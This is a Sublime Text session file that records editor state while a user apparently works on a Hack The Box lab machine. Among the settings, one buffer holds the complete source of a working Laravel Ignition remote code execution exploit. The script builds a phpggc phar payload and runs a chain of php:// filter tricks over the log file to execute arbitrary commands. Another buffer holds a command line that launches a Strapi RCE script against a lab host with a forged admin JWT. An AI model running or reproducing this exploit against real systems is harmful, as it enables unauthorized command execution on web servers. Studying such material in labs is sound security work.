{
	"folder_history":
	[
	],
	"last_version": 3211,
	"last_window_id": 9,
	"log_indexing": false,
	"settings":
	{
		"new_window_height": 1382.0,
		"new_window_settings":
		{
			"auto_complete":
			{
				"selected_items":
				[
				]
			},
			"build_system_choices":
			[
				[
					[
						[
							"Packages/Python/Python.sublime-build",
							""
						],
						[
							"Packages/Python/Python.sublime-build",
							"Syntax Check"
						],
						[
							"Packages/Conda/Conda.sublime-build",
							""
						]
					],
					[
						"Packages/Python/Python.sublime-build",
						""
					]
				]
			],
			"build_varint": "",
			"command_palette":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
					[
						"colo",
						"Colorsublime: Install Theme"
					],
					[
						"install",
						"Package Control: Install Package"
					],
					[
						"coloe",
						"Colorsublime: Install Theme"
					],
					[
						"color",
						"Colorsublime: Install Theme"
					],
					[
						"form",
						"AutoPEP8: Format Code"
					],
					[
						"forma",
						"AutoPEP8: Format Code"
					],
					[
						"instal",
						"Package Control: Install Package"
					]
				],
				"width": 0.0
			},
			"console":
			{
				"height": 0.0,
				"history":
				[
				]
			},
			"distraction_free":
			{
				"menu_visible": true,
				"show_minimap": false,
				"show_open_files": false,
				"show_tabs": false,
				"side_bar_visible": false,
				"status_bar_visible": false
			},
			"file_history":
			[
				"/tmp/fz3temp-2/test.php",
				"/tmp/fz3temp-2/index.php",
				"/tmp/fz3temp-2/index.html",
				"/home/dials/.config/sublime-text-3/Packages/User/Colorsublime.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/AutoPEP8/AutoPep8.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/User/AutoPep8.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/User/Preferences.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/Default/Preferences.sublime-settings"
			],
			"find":
			{
				"height": 54.0
			},
			"find_in_files":
			{
				"height": 154.0,
				"where_history":
				[
				]
			},
			"find_state":
			{
				"case_sensitive": false,
				"find_history":
				[
					"ftp"
				],
				"highlight": true,
				"in_selection": false,
				"preserve_case": false,
				"regex": false,
				"replace_history":
				[
				],
				"reverse": false,
				"show_context": true,
				"use_buffer2": true,
				"whole_word": false,
				"wrap": true
			},
			"incremental_find":
			{
				"height": 54.0
			},
			"input":
			{
				"height": 0.0
			},
			"menu_visible": true,
			"output.SublimeLinter":
			{
				"height": 0.0
			},
			"output.autopep8":
			{
				"height": 163.0
			},
			"output.exec":
			{
				"height": 332.0
			},
			"output.find_results":
			{
				"height": 0.0
			},
			"pinned_build_system": "",
			"replace":
			{
				"height": 104.0
			},
			"save_all_on_build": true,
			"select_file":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"select_project":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"select_symbol":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"show_minimap": true,
			"show_open_files": false,
			"show_tabs": true,
			"side_bar_visible": false,
			"side_bar_width": 150.0,
			"status_bar_visible": true,
			"template_settings":
			{
			}
		},
		"new_window_width": 1355.0
	},
	"windows":
	[
		{
			"auto_complete":
			{
				"selected_items":
				[
				]
			},
			"buffers":
			[
				{
					"file": "/home/dials/projects/coding/test2.py",
					"settings":
					{
						"buffer_size": 601,
						"encoding": "UTF-8",
						"line_ending": "Unix"
					}
				},
				{
					"file": "/home/dials/projects/coding/test3.py",
					"settings":
					{
						"buffer_size": 645,
						"encoding": "UTF-8",
						"line_ending": "Unix"
					}
				},
				{
					"file": "/home/dials/projects/coding/strapi_pw_reset.py",
					"settings":
					{
						"buffer_size": 892,
						"encoding": "UTF-8",
						"line_ending": "Unix"
					}
				},
				{
					"contents": "/usr/lib/node_modules/npm/node_modules/npm-lifecycle/node-gyp-bin:/opt/strapi/myapi/node_modules/.bin:/opt/strapi/myapi/node_modules/.bin:/opt/strapi/node_modules/.bin:/opt/node_modules/.bin:/node_modules/.bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin\nNew path exported: /usr/lib/node_modules/npm/node_modules/npm-lifecycle/node-gyp-bin:/opt/strapi/myapi/node_modules/.bin:/opt/strapi/myapi/node_modules/.bin:/opt/strapi/node_modules/.bin:/opt/node_modules/.bin:/node_modules/.bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin\n\n\n/opt/strapi/myapi/node_modules/.bin\n/opt/strapi/myapi/node_modules/.bin\n\n/opt/strapi/ node_modules/.bin\n/opt/strapi/myapi/node_modules/.bin\n/opt/strapi/myapi/node_modules/.bin\n/opt/strapi",
					"settings":
					{
						"buffer_size": 844,
						"line_ending": "Unix",
						"name": "/usr/lib/node_modules/npm/node_modules/npm-lifecyc"
					}
				},
				{
					"file": "/home/dials/projects/coding/strapi_jwt.py",
					"settings":
					{
						"buffer_size": 1518,
						"encoding": "UTF-8",
						"line_ending": "Unix"
					}
				},
				{
					"file": "/home/dials/projects/coding/Strapi_RCE.py",
					"settings":
					{
						"buffer_size": 1070,
						"line_ending": "Unix"
					}
				},
				{
					"contents": "\n\n#!/usr/bin/env python3\n\nimport requests, sys, re, os\n\nheader={\n    \"Accept\": \"application/json\"\n}\n\ndata = {\n        \"solution\":\"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\",\\\n        \"parameters\":{\n            \"variableName\":\"cm0s\",\n            \"viewFile\":\"\"\n        }\n    }\n\ndef clear_log(url='', viewFile=''):\n\n    global data\n\n    data['parameters']['viewFile'] = viewFile\n    while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass\n    requests.post(url=url, json=data, headers=header, verify=False)\n    requests.post(url=url, json=data, headers=header, verify=False)\n\ndef create_payload(url='', viewFile=''):\n\n    global data\n\n    data['parameters']['viewFile'] = viewFile\n    resp = requests.post(url=url, json=data, headers=header, verify=False)\n    if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:\n        return True\n    return False\n\ndef convert(url='', viewFile=''):\n\n    global data\n\n    data['parameters']['viewFile'] = viewFile\n    resp = requests.post(url=url, json=data, headers=header, verify=False)\n    if resp.status_code == 200:\n        return True\n    return False\n\ndef exploited(url='', viewFile=''):\n\n    global data\n\n    data['parameters']['viewFile'] = viewFile\n    resp = requests.post(url=url, json=data, headers=header, verify=False)\n    if resp.status_code == 500 and 'cannot be empty' in resp.text:\n        m = re.findall(r'\\{(.|\\n)+\\}((.|\\n)*)', resp.text)\n        print()\n        print(m[0][1])\n\ndef generate_payload(command='', padding=0):\n    if '/' in command:\n        command = command.replace('/', '\\/')\n        command = command.replace('\\'', '\\\\\\'')\n    os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\\0=00/g' > payload.txt'''%(command))\n    payload = ''\n    with open('payload.txt', 'r') as fp:\n        payload = fp.read()\n        payload = payload.replace('==', '=3D=')\n        for i in range(padding):\n            payload += '=00'\n    os.system('rm -rf payload.txt')\n    return payload\n\n\ndef main():\n\n    if len(sys.argv) < 4:\n        print('Usage:  %s url path-log command\\n'%(sys.argv[0]))\n        print('\\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \\'id\\''%(sys.argv[0]))\n        exit(1)\n\n    if not os.path.isfile('./phpggc/phpggc'):\n        print('Phpggc not found!')\n        print('Run command: git clone https://github.com/ambionics/phpggc.git')\n        os.system('git clone https://github.com/ambionics/phpggc.git')\n\n    url = sys.argv[1]\n    path_log = sys.argv[2]\n    command = sys.argv[3]\n    padding = 0\n\n    payload = generate_payload(command, padding)\n    if not payload:\n        print('Generate payload error!')\n        exit(1)\n\n    if 'http' not in url and 'https' not in url:\n        url = 'http'+url\n    else:\n        url = url+'/_ignition/execute-solution'\n\n    print('\\nExploit...')\n    clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))\n    create_payload(url, 'AA')\n    create_payload(url, payload)\n    while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))):\n        clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))\n        create_payload(url, 'AA')\n        padding += 1\n        payload = generate_payload(command, padding)\n        create_payload(url, payload)\n    \n    exploited(url, 'phar://%s'%(path_log))\n\nif __name__ == '__main__':\n    main()\n          ",
					"file": "/home/dials/projects/coding/laravel.py",
					"file_size": 0,
					"file_write_time": 132817352019245243,
					"settings":
					{
						"buffer_size": 3684,
						"line_ending": "Unix"
					}
				},
				{
					"contents": "python3 Strapi_RCE.py api-prod.horizontall.htb 10.10.14.38 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM3MTAyMDkyLCJleHAiOjE2Mzk2OTQwOTJ9.w16IpubnlzPQ6Qs9uEODaQsHiualtoV1IWR_XlN6ZLw http://api-prod.horizontall.htb/ ",
					"settings":
					{
						"buffer_size": 250,
						"line_ending": "Unix",
						"name": "python3 Strapi_RCE.py api-prod.horizontall.htb 10."
					}
				}
			],
			"build_system": "",
			"build_system_choices":
			[
				[
					[
						[
							"Packages/Python/Python.sublime-build",
							""
						],
						[
							"Packages/Python/Python.sublime-build",
							"Syntax Check"
						],
						[
							"Packages/Conda/Conda.sublime-build",
							""
						]
					],
					[
						"Packages/Python/Python.sublime-build",
						""
					]
				]
			],
			"build_varint": "",
			"command_palette":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
					[
						"colo",
						"Colorsublime: Install Theme"
					],
					[
						"install",
						"Package Control: Install Package"
					],
					[
						"coloe",
						"Colorsublime: Install Theme"
					],
					[
						"color",
						"Colorsublime: Install Theme"
					],
					[
						"form",
						"AutoPEP8: Format Code"
					],
					[
						"forma",
						"AutoPEP8: Format Code"
					],
					[
						"instal",
						"Package Control: Install Package"
					]
				],
				"width": 0.0
			},
			"console":
			{
				"height": 0.0,
				"history":
				[
				]
			},
			"distraction_free":
			{
				"menu_visible": true,
				"show_minimap": false,
				"show_open_files": false,
				"show_tabs": false,
				"side_bar_visible": false,
				"status_bar_visible": false
			},
			"file_history":
			[
				"/home/dials/projects/coding/Strapi_RCE.py",
				"/home/dials/projects/coding/test.sh",
				"/home/dials/projects/coding/webpack.js",
				"/home/dials/.config/sublime-text-3/Packages/User/AutoPep8.sublime-settings",
				"/tmp/fz3temp-2/test.php",
				"/tmp/fz3temp-2/index.php",
				"/tmp/fz3temp-2/index.html",
				"/home/dials/.config/sublime-text-3/Packages/User/Colorsublime.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/AutoPEP8/AutoPep8.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/User/Preferences.sublime-settings",
				"/home/dials/.config/sublime-text-3/Packages/Default/Preferences.sublime-settings"
			],
			"find":
			{
				"height": 33.0
			},
			"find_in_files":
			{
				"height": 154.0,
				"where_history":
				[
				]
			},
			"find_state":
			{
				"case_sensitive": false,
				"find_history":
				[
					"ftp"
				],
				"highlight": true,
				"in_selection": false,
				"preserve_case": false,
				"regex": false,
				"replace_history":
				[
				],
				"reverse": false,
				"show_context": true,
				"use_buffer2": true,
				"whole_word": false,
				"wrap": true
			},
			"groups":
			[
				{
					"selected": 6,
					"sheets":
					[
						{
							"buffer": 0,
							"file": "/home/dials/projects/coding/test2.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 601,
								"regions":
								{
								},
								"selection":
								[
									[
										601,
										601
									]
								],
								"settings":
								{
									"autopep8_view_autosave": true,
									"syntax": "Packages/Python/Python.sublime-syntax"
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 7,
							"type": "text"
						},
						{
							"buffer": 1,
							"file": "/home/dials/projects/coding/test3.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 645,
								"regions":
								{
								},
								"selection":
								[
									[
										59,
										59
									]
								],
								"settings":
								{
									"autopep8_view_autosave": true,
									"syntax": "Packages/Python/Python.sublime-syntax"
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 6,
							"type": "text"
						},
						{
							"buffer": 2,
							"file": "/home/dials/projects/coding/strapi_pw_reset.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 892,
								"regions":
								{
								},
								"selection":
								[
									[
										0,
										0
									]
								],
								"settings":
								{
									"auto_name": "",
									"syntax": "Packages/Python/Python.sublime-syntax"
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 5,
							"type": "text"
						},
						{
							"buffer": 3,
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 844,
								"regions":
								{
								},
								"selection":
								[
									[
										844,
										844
									]
								],
								"settings":
								{
									"auto_name": "/usr/lib/node_modules/npm/node_modules/npm-lifecyc",
									"default_dir": "/home/dials/projects/coding",
									"syntax": "Packages/Text/Plain text.tmLanguage"
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 3,
							"type": "text"
						},
						{
							"buffer": 4,
							"file": "/home/dials/projects/coding/strapi_jwt.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 1518,
								"regions":
								{
								},
								"selection":
								[
									[
										321,
										321
									]
								],
								"settings":
								{
									"syntax": "Packages/Python/Python.sublime-syntax",
									"tab_size": 2,
									"translate_tabs_to_spaces": true
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 2,
							"type": "text"
						},
						{
							"buffer": 5,
							"file": "/home/dials/projects/coding/Strapi_RCE.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 1070,
								"regions":
								{
								},
								"selection":
								[
									[
										502,
										502
									]
								],
								"settings":
								{
									"syntax": "Packages/Python/Python.sublime-syntax",
									"tab_size": 4,
									"translate_tabs_to_spaces": true
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 1,
							"type": "text"
						},
						{
							"buffer": 6,
							"file": "/home/dials/projects/coding/laravel.py",
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 3684,
								"regions":
								{
								},
								"selection":
								[
									[
										1213,
										1213
									]
								],
								"settings":
								{
									"syntax": "Packages/Python/Python.sublime-syntax",
									"tab_size": 4,
									"translate_tabs_to_spaces": true
								},
								"translation.x": 0.0,
								"translation.y": 648.0,
								"zoom_level": 1.0
							},
							"stack_index": 0,
							"type": "text"
						},
						{
							"buffer": 7,
							"semi_transient": false,
							"settings":
							{
								"buffer_size": 250,
								"regions":
								{
								},
								"selection":
								[
									[
										0,
										0
									]
								],
								"settings":
								{
									"auto_name": "python3 Strapi_RCE.py api-prod.horizontall.htb 10.",
									"default_dir": "/home/dials/projects/coding",
									"syntax": "Packages/Text/Plain text.tmLanguage"
								},
								"translation.x": 0.0,
								"translation.y": 0.0,
								"zoom_level": 1.0
							},
							"stack_index": 4,
							"type": "text"
						}
					]
				}
			],
			"incremental_find":
			{
				"height": 33.0
			},
			"input":
			{
				"height": 0.0
			},
			"layout":
			{
				"cells":
				[
					[
						0,
						0,
						1,
						1
					]
				],
				"cols":
				[
					0.0,
					1.0
				],
				"rows":
				[
					0.0,
					1.0
				]
			},
			"menu_visible": true,
			"output.SublimeLinter":
			{
				"height": 0.0
			},
			"output.autopep8":
			{
				"height": 163.0
			},
			"output.exec":
			{
				"height": 127.0
			},
			"output.find_results":
			{
				"height": 0.0
			},
			"pinned_build_system": "",
			"position": "0,0,0,0,0,3761,0,5116,1376,3840,2160",
			"project": "",
			"replace":
			{
				"height": 62.0
			},
			"save_all_on_build": true,
			"select_file":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"select_project":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"select_symbol":
			{
				"height": 0.0,
				"last_filter": "",
				"selected_items":
				[
				],
				"width": 0.0
			},
			"selected_group": 0,
			"settings":
			{
			},
			"show_minimap": true,
			"show_open_files": false,
			"show_tabs": true,
			"side_bar_visible": false,
			"side_bar_width": 150.0,
			"status_bar_visible": true,
			"template_settings":
			{
			},
			"window_id": 5,
			"workspace_name": ""
		}
	],
	"workspaces":
	{
		"recent_workspaces":
		[
		]
	}
}
